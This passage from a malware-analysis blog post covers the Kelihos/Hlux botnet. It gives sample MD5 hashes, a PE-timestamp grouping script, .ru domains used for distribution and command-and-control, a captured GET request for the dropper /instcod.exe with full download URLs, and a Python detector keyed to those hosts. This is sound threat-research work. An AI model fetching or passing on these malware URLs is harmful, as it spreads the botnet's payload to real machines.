<span style="font-family: inherit;">Mar. 2012 - </span><a href="http://blog.eset.com/2012/03/10/kelihos-not-alien-resurrection-more-attack-of-the-clones">Kelihos: not Alien Resurrection, more Attack of the Clones - ESET</a></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Mar. 2012 - <a href="http://www.securelist.com/en/blog/208193438/FAQ_Disabling_the_new_Hlux_Kelihos_Botnet">FAQ: Disabling the new Hlux/Kelihos Botnet - Securelist</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Mar. 2012 - <a href="http://www.abuse.ch/?p=3658">Kelihos Back In Town Using Fast Flux - Abuse.ch</a></span><br />
Feb. 2012 - <a href="http://community.websense.com/blogs/securitylabs/archive/2012/02/17/long-life-to-kelihos.aspx">Long life to Kelihos! - Websense / Gianluca Giuliani</a></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Feb. 2012 - <a href="http://www.securelist.com/en/blog/663/The_where_and_why_of_HLUX">The where and why of HLUX - Securelist</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Jan. 2012 - <a href="http://www.securelist.com/en/blog/655/Kelihos_Hlux_botnet_returns_with_new_techniques">Kelihos/Hlux botnet returns with new techniques - Securelist</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Sep. 2011 - <a href="http://www.securelist.com/en/blog/208193137/Botnet_Shutdown_Success_Story_How_Kaspersky_Lab_Disabled_the_Hlux_Kelihos_Botnet">Botnet Shutdown Success Story: How Kaspersky Lab Disabled the Hlux/Kelihos Botnet</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Sep. 2011 - <a href="http://blogs.technet.com/b/microsoft_blog/archive/2011/09/27/microsoft-neutralizes-kelihos-botnet-names-defendant-in-case.aspx?Redirected=true">Microsoft Neutralizes Kelihos Botnet, Names Defendant in Case</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Jan. 2011 - <a href="http://www.securelist.com/en/blog/11114/New_P2P_Botnet_Arising">New P2P Botnet Arising - Securelist</a></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">Dec. 2010 - <a href="http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20101230">New Fast Flux Botnet for the Holidays: Could it be Storm Worm 3.0/Waledac 2.0? - Shadowserver</a></span>
</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
List of recent MD5 hashes (95 files; the sample set can be downloaded from <a href="http://contagiodump.blogspot.com/2013/02/trojan-nap-aka-kelihoshlux-status.html">Contagio</a>).</div>
<div style="text-align: left;">
<span style="font-family: inherit; line-height: 19px;"><br /></span>
</div>
<div style="text-align: left;">
<div style="border: 8px double rgb(78, 150, 139); height: 280px; overflow: scroll; width: 500px;">
<span style="font-family: inherit;">01B43C0C8D620E8B88D846E4C9287CCD</span>
<span style="font-family: inherit;">036ADB0D4B856C2A5E16175BD089FF24</span>
<span style="font-family: inherit;">03F3B93A9B3D70D9BB9AD829A5F2361D</span>
<span style="font-family: inherit;">0481B4B12C8C69B735CAC2A918B52790</span>
<span style="font-family: inherit;">0530898731D7165DBABBF6BF252BA77E</span>
<span style="font-family: inherit;">08862142D7313A1D431D67E0E755EFC7</span>
<span style="font-family: inherit;">093586512549F2D016AD4C70F4F8E5C8</span>
<span style="font-family: inherit;">0BF067750C7406CF3373525DD09C293C</span>
<span style="font-family: inherit;">0C921935F0880B5C2161B3905F8A3069</span>
<span style="font-family: inherit;">0FEAAA4ADC31728E54B006AB9A7E6AFA</span>
<span style="font-family: inherit;">15B6DFADD045E8282C4927F8BDD69D3E</span>
<span style="font-family: inherit;">15B9C9632510FB4D387D4A02ABF830DD</span>
<span style="font-family: inherit;">1B342E6682167571B55AB59F3DD38D1E</span>
<span style="font-family: inherit;">1C04C6B4E0BBBC99CCEE489270C98622</span>
<span style="font-family: inherit;">1E08449CE5848B6ADFEE48B1582EAEEF</span><br />
<span style="font-family: inherit;">223D32E3F6BB9C5A6AD3CD58B898EFA1</span>
<span style="font-family: inherit;">223F7E425BD28AE13A54B2D0017D1E81</span>
<span style="font-family: inherit;">22AE2A6FF14C58265B5C79FBC25A91B6</span>
<span style="font-family: inherit;">2304FA9A6A67984CA0FF9E9BF561817A</span>
<span style="font-family: inherit;">23585DCBA9DFD4719ECC20B2D662D983</span>
<span style="font-family: inherit;">25B4C1C68C58D7D559E8682117D7C01F</span>
<span style="font-family: inherit;">288E85A4A7756268EBDED1F356531E03</span>
<span style="font-family: inherit;">28A417B0EA5BE796720463607F06CCC9</span>
<span style="font-family: inherit;">2B4A5F1C8225D9043AE1302DCCD7063B</span>
<span style="font-family: inherit;">2F091B59382F6CA9E1233EE38B171B2E</span>
<span style="font-family: inherit;">30EA180ECE416600DABC5ADA0F630D06</span>
<span style="font-family: inherit;">352A8AB0D5C7DB40F865B0E7E03B1D96</span>
<span style="font-family: inherit;">36C90E73120A419B4B00E66177040F43</span>
<span style="font-family: inherit;">3774D5BD50F4286531FEDF716D83FC6E</span>
<span style="font-family: inherit;">396B88D48CC04A8C37F4409F65EA8A97</span>
<span style="font-family: inherit;">3A76AA2439112479635D7172DB2440B1</span>
<span style="font-family: inherit;">3B6A3354B71CD674D4BC27646D270502</span>
<span style="font-family: inherit;">3D0F09DA5C5DBDB2124AEB0953F355B7</span>
<span style="font-family: inherit;">3D711B47C8FDE2C6A5E62D6AD0BA7BB5</span>
<span style="font-family: inherit;">44B342383E286465D74A838EE0780DDA</span>
<span style="font-family: inherit;">49B6D19F9307C3BBA460C936ADE26B70</span>
<span style="font-family: inherit;">4B6DFE2A4B0EF515275AC84B378D5F6F</span>
<span style="font-family: inherit;">4C2DB57ED5D27F54120765A9FA9C3BC7</span>
<span style="font-family: inherit;">51D3E04AF7E29A1E3A1748E03F0BD578</span>
<span style="font-family: inherit;">56AD23082E5E73AAEB95E5A915DF5444</span>
<span style="font-family: inherit;">5ACA74320003576F79CF6EDD0629CC13</span>
<span style="font-family: inherit;">5B947FEAA5BFA951C94B11BB9EEA9BC3</span>
<span style="font-family: inherit;">5BA7D2DE0CCC58F104240610BF297E6E</span>
<span style="font-family: inherit;">5BECB2498EA801ED010DD073007E20CE</span>
<span style="font-family: inherit;">5FFE38CA9FE07394D1BC5C270E83B253</span>
<span style="font-family: inherit;">63C926F659C3EDEC0B85C91898622A4D</span>
<span style="font-family: inherit;">69170C0C9FB4EEC6A630C4C9182505F0</span>
<span style="font-family: inherit;">6AA100C459E854A9A334B10468EAD014</span>
<span style="font-family: inherit;">6B873B6D21ECC9ADF7246D644B23FB84</span>
<span style="font-family: inherit;">6F6B016A5DB1791188D7C98A464292CC</span>
<span style="font-family: inherit;">70FD6A11E482D756BEF27546AA112206</span>
<span style="font-family: inherit;">72C1BEC266B23AF5CB12AE2F669D8784</span>
<span style="font-family: inherit;">7316D0EE9C0B6C23C7CEB2D04DC6B665</span>
<span style="font-family: inherit;">766A50581F6E47FF94126C5DBBD9FB01</span>
<span style="font-family: inherit;">76B7BB0CC2E3623078BF9E9A9A343CE1</span>
<span style="font-family: inherit;">77E2D2A1E508EA30D548293E2C36D64F</span>
<span style="font-family: inherit;">787F39D70D2BEC3139A6EA7690B88464</span>
<span style="font-family: inherit;">7E1B91800F2FE9974C7BB18A7097D933</span>
<span style="font-family: inherit;">7F7E0C58BDF1E47059DD84FFB301F6B7</span>
<span style="font-family: inherit;">8005E44761B842370D43299B29B0F16A</span>
<span style="font-family: inherit;">80E595253D3E02071D2564BA8296D308</span>
<span style="font-family: inherit;">84741D6DFFC996D35B8DC0A01111A5DE</span>
<span style="font-family: inherit;">9010DD12A1419E0F0098FD10CA324E23</span>
<span style="font-family: inherit;">9424EB9DE0558193A6B4D9607C23CBD5</span>
<span style="font-family: inherit;">9C075FB471DC66394090C8BFAA4739A4</span>
<span style="font-family: inherit;">9CA42C5B352DEFB53F8D30C16B36697A</span>
<span style="font-family: inherit;">A13B21423C5AE7BA318D0D26E672AD22</span>
<span style="font-family: inherit;">A15F02836309B819DE10068ED49D5D87</span>
<span style="font-family: inherit;">A56577564E52251C54B27D4CA62C266F</span>
<span style="font-family: inherit;">A78BE2345E524515E0DD1CCCA3C524F9</span>
<span style="font-family: inherit;">A8ABECD7C571AAEE6C964514133585F3</span>
<span style="font-family: inherit;">A910A324394B56022C7AC10DB22EC3F6</span>
<span style="font-family: inherit;">B1ABD1279A28F22B86A15D6DAFBC28A5</span>
<span style="font-family: inherit;">B568CF0982C867CD499F953E43738511</span>
<span style="font-family: inherit;">B63F25D5B02FE00D9423A7CCC0C3CCE2</span>
<span style="font-family: inherit;">B66475ED30943C0056C9402DCAECB8B9</span>
<span style="font-family: inherit;">BB5560123C62588988BC22C704CD9E03</span>
<span style="font-family: inherit;">C06414E1994BF4EFA41911CA81099411</span>
<span style="font-family: inherit;">C465888536A6785883079043F38143BD</span>
<span style="font-family: inherit;">C98F3F5709292D6D97AD96C1A8459A81</span>
<span style="font-family: inherit;">CAAFD0C9B5DC0DAB8D1A3C1D5AF9EE94</span>
<span style="font-family: inherit;">CCA50DCB8A30B325BF10CED5DAE4D51A</span>
<span style="font-family: inherit;">CE391D2B2036365D8943257FE1CB967E</span>
<span style="font-family: inherit;">D4CBEABAE5B4D4BAF14F554C8E9A4E86</span>
<span style="font-family: inherit;">DCE41A00FB703B6A6324CE4F4C4DB143</span>
<span style="font-family: inherit;">DE5FDBAD9274B21EA5391F48441D33D8</span>
<span style="font-family: inherit;">DEAF70F248599985FC32B083F16F251A</span>
<span style="font-family: inherit;">DF1A932144BF2C6E50FD090FDC1F1408</span>
<span style="font-family: inherit;">DFE01E12671BBDD7EC0F8BEBA08EC440</span>
<span style="font-family: inherit;">E2F8F5C80566BF32E1841B3C5A669D42</span>
<span style="font-family: inherit;">E453463A428A71A5DB19FC18807E747B</span>
<span style="font-family: inherit;">EB17EB2F02FA871C005C569B3299FCBA</span>
<span style="font-family: inherit;">EB4DBB18D00321A809A6C4D8594DDF5A</span>
<span style="font-family: inherit;">F5A6FC81A4F5AE6DEBFAC463DD49E1C2</span>
<span style="font-family: inherit;">F604C7E4EC3A12A83E0852A9D7FE75CA</span>
<span style="font-family: inherit;">F96EBF8128BFC6965C73A2659718C663</span>
<span style="font-family: inherit;">FE501F12B34701CF8AF5DD307C314862</span></div>
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;"><br /></span></span>
<span style="font-family: inherit;">List of files sorted by PE header TimeDateStamp. The stamp is not always indicative of age, since it can be set to anything (all of these samples are recent, 2012-2013, whatever the header says), but it is helpful for grouping variants.</span><br />
<span style="font-family: inherit;"><span style="line-height: 18.99147605895996px;"><br /></span></span>
<br />
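The grouping below can be reproduced by reading the COFF header directly, without a PE library. This is an added example, not a script from the original post. The PE bytes are constructed stand-ins (a DOS header with e_lfanew, the PE signature and a bare COFF header, no sections), so their real MD5s differ from the labels; the labels reuse a few hashes from the list purely to tie each stand-in to the month the post places it in. The 1993 lower bound is the PE format's own introduction with Windows NT 3.1 and is used to file stamps such as the 1985 one as forged rather than as a build month.

```python
import struct
from collections import defaultdict
from datetime import datetime, timezone
from typing import Dict, List, Optional

# The PE format arrived with Windows NT 3.1 in 1993; an earlier stamp cannot
# be a genuine link time, whatever the rest of the header says.
PE_FORMAT_EPOCH = datetime(1993, 1, 1, tzinfo=timezone.utc)


def pe_timestamp(data: bytes) -> int:
    """Return the COFF header TimeDateStamp (seconds since 1970-01-01 UTC).

    Layout: 'MZ' at offset 0, e_lfanew (DWORD) at 0x3C, 'PE\\0\\0' at
    e_lfanew, then the 20-byte COFF header: Machine, NumberOfSections,
    TimeDateStamp (at +8), PointerToSymbolTable, NumberOfSymbols,
    SizeOfOptionalHeader, Characteristics.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return stamp


def stamp_bucket(stamp: int) -> str:
    """'YYYY-MM' key, the granularity used by the list below."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m")


def stamp_is_plausible(stamp: int, now: Optional[datetime] = None) -> bool:
    """False for stamps that cannot be real: before the PE format existed or
    in the future. True proves nothing; the field is a plain DWORD that a
    packer or the author can overwrite."""
    now = now or datetime.now(timezone.utc)
    return PE_FORMAT_EPOCH <= datetime.fromtimestamp(stamp, tz=timezone.utc) <= now


def group_by_stamp(samples: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Map 'YYYY-MM' -> sorted sample labels. Implausible stamps are kept but
    filed under 'suspect:YYYY-MM' so they are not read as build months."""
    buckets: Dict[str, List[str]] = defaultdict(list)
    for label, data in samples.items():
        stamp = pe_timestamp(data)
        key = stamp_bucket(stamp)
        if not stamp_is_plausible(stamp):
            key = "suspect:" + key
        buckets[key].append(label)
    return {k: sorted(v) for k, v in sorted(buckets.items())}


def make_pe(stamp: int) -> bytes:
    """Smallest input the parser accepts: a DOS header with e_lfanew = 0x40,
    the PE signature, and a COFF header for an i386 image with one section.
    Constructed for this example; it is not a loadable executable."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, stamp, 0, 0, 0xE0, 0x102)
    return bytes(dos) + b"PE\0\0" + coff


def _epoch(year: int, month: int, day: int) -> int:
    return int(datetime(year, month, day, tzinfo=timezone.utc).timestamp())


# Constructed stand-ins. Labels reuse hashes from the post's list for the
# month it places them in; the bytes are synthetic, so their real MD5s differ.
SAMPLES: Dict[str, bytes] = {
    "84741D6DFFC996D35B8DC0A01111A5DE": make_pe(_epoch(1985, 12, 15)),  # the post's 1985 outlier
    "766A50581F6E47FF94126C5DBBD9FB01": make_pe(_epoch(2012, 11, 3)),
    "01B43C0C8D620E8B88D846E4C9287CCD": make_pe(_epoch(2012, 12, 20)),
    "15B9C9632510FB4D387D4A02ABF830DD": make_pe(_epoch(2012, 12, 28)),
    "0481B4B12C8C69B735CAC2A918B52790": make_pe(_epoch(2013, 1, 9)),
}

if __name__ == "__main__":
    for month, labels in group_by_stamp(SAMPLES).items():
        print(month)
        for label in labels:
            print("  " + label)
```

On real samples, replace `SAMPLES` with files read from disk and label them by their MD5; the stamp still only groups builds that share a toolchain run, so it is a pivot for finding variants, not a dating method.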
<div style="border: 8px double rgb(78, 150, 139); height: 280px; overflow: scroll; width: 500px;">
1985-12<br />
84741D6DFFC996D35B8DC0A01111A5DE<br />
<br />
2009<br />
23585DCBA9DFD4719ECC20B2D662D983<br />
A78BE2345E524515E0DD1CCCA3C524F9<br />
<br />
2010-01<br />
03F3B93A9B3D70D9BB9AD829A5F2361D<br />
787F39D70D2BEC3139A6EA7690B88464<br />
<br />
2010-02<br />
5B947FEAA5BFA951C94B11BB9EEA9BC3<br />
<br />
2010-03<br />
288E85A4A7756268EBDED1F356531E03<br />
<br />
2010-04<br />
0530898731D7165DBABBF6BF252BA77E<br />
15B6DFADD045E8282C4927F8BDD69D3E<br />
<br />
2010-05<br />
B568CF0982C867CD499F953E43738511<br />
C465888536A6785883079043F38143BD<br />
CE391D2B2036365D8943257FE1CB967E<br />
<br />
2010-06<br />
036ADB0D4B856C2A5E16175BD089FF24<br />
28A417B0EA5BE796720463607F06CCC9<br />
<br />
2010-07<br />
51D3E04AF7E29A1E3A1748E03F0BD578<br />
70FD6A11E482D756BEF27546AA112206<br />
76B7BB0CC2E3623078BF9E9A9A343CE1<br />
<br />
2010-11<br />
3D0F09DA5C5DBDB2124AEB0953F355B7<br />
<br />
2010-12<br />
0FEAAA4ADC31728E54B006AB9A7E6AFA<br />
<br />
2011-01<br />
9424EB9DE0558193A6B4D9607C23CBD5<br />
DFE01E12671BBDD7EC0F8BEBA08EC440<br />
<br />
2011-02<br />
352A8AB0D5C7DB40F865B0E7E03B1D96<br />
BB5560123C62588988BC22C704CD9E03<br />
<br />
2011-04<br />
D4CBEABAE5B4D4BAF14F554C8E9A4E86<br />
<br />
2011-05<br />
1E08449CE5848B6ADFEE48B1582EAEEF<br />
B63F25D5B02FE00D9423A7CCC0C3CCE2<br />
C98F3F5709292D6D97AD96C1A8459A81<br />
<br />
2011-07<br />
B66475ED30943C0056C9402DCAECB8B9<br />
<br />
2011-08<br />
7F7E0C58BDF1E47059DD84FFB301F6B7<br />
DCE41A00FB703B6A6324CE4F4C4DB143<br />
F604C7E4EC3A12A83E0852A9D7FE75CA<br />
<br />
2011-09<br />
396B88D48CC04A8C37F4409F65EA8A97<br />
72C1BEC266B23AF5CB12AE2F669D8784<br />
77E2D2A1E508EA30D548293E2C36D64F<br />
9C075FB471DC66394090C8BFAA4739A4<br />
C06414E1994BF4EFA41911CA81099411<br />
DF1A932144BF2C6E50FD090FDC1F1408<br />
<br />
2011-10<br />
0C921935F0880B5C2161B3905F8A3069<br />
3D711B47C8FDE2C6A5E62D6AD0BA7BB5<br />
5ACA74320003576F79CF6EDD0629CC13<br />
<br />
2011-11<br />
2B4A5F1C8225D9043AE1302DCCD7063B<br />
3774D5BD50F4286531FEDF716D83FC6E<br />
5BA7D2DE0CCC58F104240610BF297E6E<br />
9CA42C5B352DEFB53F8D30C16B36697A<br />
<br />
2011-12<br />
E2F8F5C80566BF32E1841B3C5A669D42<br />
<br />
2012-01<br />
F96EBF8128BFC6965C73A2659718C663<br />
<br />
2012-02<br />
6F6B016A5DB1791188D7C98A464292CC<br />
<br />
2012-03<br />
093586512549F2D016AD4C70F4F8E5C8<br />
<br />
2012-04<br />
80E595253D3E02071D2564BA8296D308<br />
<br />
2012-06<br />
08862142D7313A1D431D67E0E755EFC7<br />
223D32E3F6BB9C5A6AD3CD58B898EFA1<br />
5BECB2498EA801ED010DD073007E20CE<br />
5FFE38CA9FE07394D1BC5C270E83B253<br />
A910A324394B56022C7AC10DB22EC3F6<br />
<br />
2012-07<br />
3B6A3354B71CD674D4BC27646D270502<br />
4C2DB57ED5D27F54120765A9FA9C3BC7<br />
<br />
2012-08<br />
2304FA9A6A67984CA0FF9E9BF561817A<br />
7316D0EE9C0B6C23C7CEB2D04DC6B665<br />
EB4DBB18D00321A809A6C4D8594DDF5A<br />
<br />
2012-10<br />
25B4C1C68C58D7D559E8682117D7C01F<br />
63C926F659C3EDEC0B85C91898622A4D<br />
6AA100C459E854A9A334B10468EAD014<br />
8005E44761B842370D43299B29B0F16A<br />
B1ABD1279A28F22B86A15D6DAFBC28A5<br />
DEAF70F248599985FC32B083F16F251A<br />
<br />
2012-11<br />
766A50581F6E47FF94126C5DBBD9FB01<br />
<br />
2012-12<br />
01B43C0C8D620E8B88D846E4C9287CCD<br />
15B9C9632510FB4D387D4A02ABF830DD<br />
1B342E6682167571B55AB59F3DD38D1E<br />
1C04C6B4E0BBBC99CCEE489270C98622<br />
30EA180ECE416600DABC5ADA0F630D06<br />
36C90E73120A419B4B00E66177040F43<br />
3A76AA2439112479635D7172DB2440B1<br />
44B342383E286465D74A838EE0780DDA<br />
56AD23082E5E73AAEB95E5A915DF5444<br />
69170C0C9FB4EEC6A630C4C9182505F0<br />
6B873B6D21ECC9ADF7246D644B23FB84<br />
7E1B91800F2FE9974C7BB18A7097D933<br />
9010DD12A1419E0F0098FD10CA324E23<br />
A15F02836309B819DE10068ED49D5D87<br />
A56577564E52251C54B27D4CA62C266F<br />
A8ABECD7C571AAEE6C964514133585F3<br />
CAAFD0C9B5DC0DAB8D1A3C1D5AF9EE94<br />
DE5FDBAD9274B21EA5391F48441D33D8<br />
EB17EB2F02FA871C005C569B3299FCBA<br />
F5A6FC81A4F5AE6DEBFAC463DD49E1C2<br />
<br />
2013-01<br />
0481B4B12C8C69B735CAC2A918B52790<br />
223F7E425BD28AE13A54B2D0017D1E81<br />
2F091B59382F6CA9E1233EE38B171B2E<br />
49B6D19F9307C3BBA460C936ADE26B70<br />
A13B21423C5AE7BA318D0D26E672AD22<br />
CCA50DCB8A30B325BF10CED5DAE4D51A<br />
E453463A428A71A5DB19FC18807E747B<br />
<br />
2013-02<br />
4B6DFE2A4B0EF515275AC84B378D5F6F<br />
<br />
09-2020<br />
22AE2A6FF14C58265B5C79FBC25A91B6<br />
<span style="font-family: inherit; text-align: left;"> </span></div>
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;"> </span></span>
<br />
<div>
</div>
<span style="font-family: inherit;"> <span style="text-align: left;"><span style="line-height: 19px;">Some of the domains we saw from the binaries above: (see the full list of associated domains below)</span></span></span><br />
<span style="font-family: inherit;"><span style="text-align: left;"><span style="line-height: 19px;">
</span></span> <span style="line-height: 19px;">akpuxqaz.ru</span></span></div>
<div style="text-align: left;">
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;">apnifosa.ru</span></span><br />
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;">bugfivin.ru </span></span><br />
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;">cagremub.ru</span></span><br />
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;">diqnawug.ru</span></span><br />
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;">dufyhive.ru</span></span><br />
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;">jiwviqpa.ru</span></span><br />
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;">merwiqca.ru</span></span><br />
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;">wowrizep.ru</span></span>
<br />
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;"><br /></span></span>
<span style="text-align: left;"><span style="font-family: inherit; line-height: 19px;"><b>Traffic information</b></span></span></div>
<div>
<blockquote class="tr_bq">
GET /instcod.exe HTTP/1.0<br />
Host: wowrizep.ru</blockquote>
<blockquote class="tr_bq">
HTTP/1.1 200 Ok<br />
Server: Apache<br />
Content-Length: 785920<br />
Content-Type: application/octet-stream<br />
Last-Modified: .., 06 ... 2013 13:47:52 GMT<br />
Accept-Ranges: bytes<br />
MZ......................@...................................|...........!..L.!..This program must be run under Win32</blockquote>
<br />
<span style="font-family: inherit;"><b>Domains associated with Kelihos distribution and CnC</b></span><br />
<span style="font-family: inherit;">The HTTP request is still incomplete in this example: a plain HTTP/1.0 GET carrying only a Host header and no User-Agent (as described here <a href="http://www.abuse.ch/?p=3658">http://www.abuse.ch/?p=3658</a>)</span><br />
<blockquote class="tr_bq">
URL: http://wowrizep.ru/instcod.exe<br />
TYPE: GET<br />
UA: None<br />
URL: http://jiwviqpa.ru/instcod.exe<br />
TYPE: GET</blockquote>
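The request pattern above (a bare HTTP/1.0 GET for /instcod.exe with only a Host header, no User-Agent, to one of the listed .ru domains) is easy to turn into a detection. The following is an added example written for this post, not code from the original article: it parses captured raw HTTP requests, keeps hard indicators (a host from the list, the known dropper path) separate from the weaker shape-based indicator (bare HTTP/1.0 GET without User-Agent), and runs over three constructed sample requests. The host set is the subset of domains named above; the second and third sample requests are made up for the example.

```python
"""Flag Kelihos-style dropper downloads in captured HTTP requests.

Added example (not code from the original post). It applies the observation
made above: the dropper was fetched as GET /instcod.exe over HTTP/1.0 with
only a Host header and no User-Agent, from one of the listed .ru domains.
"""
import re

# Hosts named in the post. The path is the dropper file name seen in the capture.
KELIHOS_HOSTS = {
    "wowrizep.ru", "jiwviqpa.ru", "akpuxqaz.ru", "apnifosa.ru",
    "bugfivin.ru", "cagremub.ru", "diqnawug.ru", "dufyhive.ru",
    "merwiqca.ru",
}
KNOWN_PATHS = {"/instcod.exe"}

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/(?P<ver>\d\.\d)$")


def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, version, headers).

    Header names are lower-cased so lookups do not depend on client casing.
    Returns None when the first line is not an HTTP request line.
    """
    lines = raw.replace("\r\n", "\n").strip("\n").split("\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return m["method"], m["path"], m["ver"], headers


def score_request(raw: str):
    """Return the reasons a request looks like a Kelihos dropper fetch.

    An empty list means nothing matched. Reasons are kept separate so an
    analyst can tell a hard indicator (known host or path) from the weak
    one (a bare HTTP/1.0 GET with no User-Agent, as in the capture above).
    """
    parsed = parse_request(raw)
    if parsed is None:
        return []
    method, path, ver, headers = parsed
    host = headers.get("host", "").lower().rstrip(".")
    reasons = []
    if host in KELIHOS_HOSTS:
        reasons.append(f"host {host} is a known Kelihos domain")
    if path.lower() in KNOWN_PATHS:
        reasons.append(f"path {path} is the known dropper name")
    if method == "GET" and ver == "1.0" and "user-agent" not in headers:
        reasons.append("bare HTTP/1.0 GET without User-Agent (matches the observed downloader)")
    return reasons


def scan(requests):
    """Run score_request over captured requests; return (host, path, reasons) for hits only."""
    hits = []
    for raw in requests:
        reasons = score_request(raw)
        if reasons:
            parsed = parse_request(raw)
            hits.append((parsed[3].get("host", "?"), parsed[1], reasons))
    return hits


# Constructed samples: the first mirrors the capture shown above, the second is
# a normal browser request, the third has the bare-request shape to an unlisted
# host and should be flagged on the weak indicator only.
SAMPLE_REQUESTS = [
    "GET /instcod.exe HTTP/1.0\r\nHost: wowrizep.ru\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET /update.bin HTTP/1.0\r\nHost: cdn.example.net\r\n\r\n",
]

if __name__ == "__main__":
    for host, path, reasons in scan(SAMPLE_REQUESTS):
        print(f"{host}{path}")
        for r in reasons:
            print(f"  - {r}")
```

The weak indicator on its own produces noise (some legitimate updaters also send minimal HTTP/1.0 requests), so in practice it is used to rank, not to block; the host and path matches are what you alert on.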
<blockquote class="tr_bq">
<b>wowrizep.ru</b></blockquote>
<blockquote class="tr_bq">
<span style="font-family: inherit;">nserver: ns2.larstor.com.</span><br />
<span style="font-family: inherit;">nserver: ns3.larstor.com.</span><br />
<span style="font-family: inherit;">nserver: ns4.larstor.com.</span><br />
<span style="font-family: inherit;">nserver: ns5.larstor.com.</span><br />
<span style="font-family: inherit;">nserver: ns6.larstor.com.</span><br />
<span style="font-family: inherit;">state: REGISTERED, NOT DELEGATED, UNVERIFIED</span><br />
<span style="font-family: inherit;">person: Private Person</span><br />
<span style="font-family: inherit;">registrar: REGGI-REG-RIPN</span><br />
<span style="font-family: inherit;">admin-contact: https://panel.reggi.ru/user/whois/webmail/</span><br />
<span style="font-family: inherit;">created: 2012.12.22</span><br />
<span style="font-family: inherit;">paid-till: 2013.12.22</span><br />
<span style="font-family: inherit;">free-date: 2014.01.22</span></blockquote>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Over 6 hours, one infected machine communicated with over 1,550 peers (unique IPs). The traffic flow below is shown from our sandbox IP in San Francisco, CA.</span><br />
<script type="text/javascript">
window.onload=function(){
var tfrow = document.getElementById('tfhover').rows.length;
var tbRow=[];
for (var i=1;i<tfrow;i++) {
tbRow[i]=document.getElementById('tfhover').rows[i];
tbRow[i].onmouseover = function(){
this.style.backgroundColor = '#4D938C';
};
tbRow[i].onmouseout = function() {
this.style.backgroundColor = '#4D938C';
};
}
};
</script>
<style type="text/css">
table.tftable {font-size:12px;color:#4D938C;width:100%;border-width: 1px;border-color: #4D938C;border-collapse: collapse;}
table.tftable th {font-size:12px;background-color:#4D938C;border-width: 1px;padding: 8px;border-style: solid;border-color: #4D938C;text-align:left;}
table.tftable tr {background-color:#4D938C;}
table.tftable td {font-size:12px;border-width: 1px;padding: 8px;border-style: solid;border-color: #4D938C;}
</style>
<br />
<table border="1" class="tftable" id="tfhover">
<tbody>
<tr><th><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiqGEb_rnXe7EOl1K4n8EtXKgHCCS6fH_VjH0JAN7lcep3y2NUDX6GvuzUwn8__wW7Kyy2Jjb305sCsBbSEIm9Y0nW1YoSzHuQOJjyB7896fv_rI_oVlTbxIecjp895YTKD4hoFGYBhuE/s1600/usa.PNG" imageanchor="1" style="font-weight: normal; margin-left: 1em; margin-right: 1em; text-align: left;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiqGEb_rnXe7EOl1K4n8EtXKgHCCS6fH_VjH0JAN7lcep3y2NUDX6GvuzUwn8__wW7Kyy2Jjb305sCsBbSEIm9Y0nW1YoSzHuQOJjyB7896fv_rI_oVlTbxIecjp895YTKD4hoFGYBhuE/s320/usa.PNG" width="320" /></a></div>
</th><th><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Y98vCnFYWGl1My77dHxcaT6hsEmd6n0QHNLnFEB6UwTkmL5vz0JPQl6rTNWjeL2h49QgYJ71sR4YjqM_Bc-v9cz2bSvwJp3sbqElUFb8cdk2-TgMoVMY3qLjEWZe7lR3k4RYCrkklOU/s1600/eu.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Y98vCnFYWGl1My77dHxcaT6hsEmd6n0QHNLnFEB6UwTkmL5vz0JPQl6rTNWjeL2h49QgYJ71sR4YjqM_Bc-v9cz2bSvwJp3sbqElUFb8cdk2-TgMoVMY3qLjEWZe7lR3k4RYCrkklOU/s320/eu.PNG" width="320" /></a></div>
<div style="text-align: left;">
</div>
</th></tr>
<tr><td><div class="separator" style="clear: both; text-align: center;">
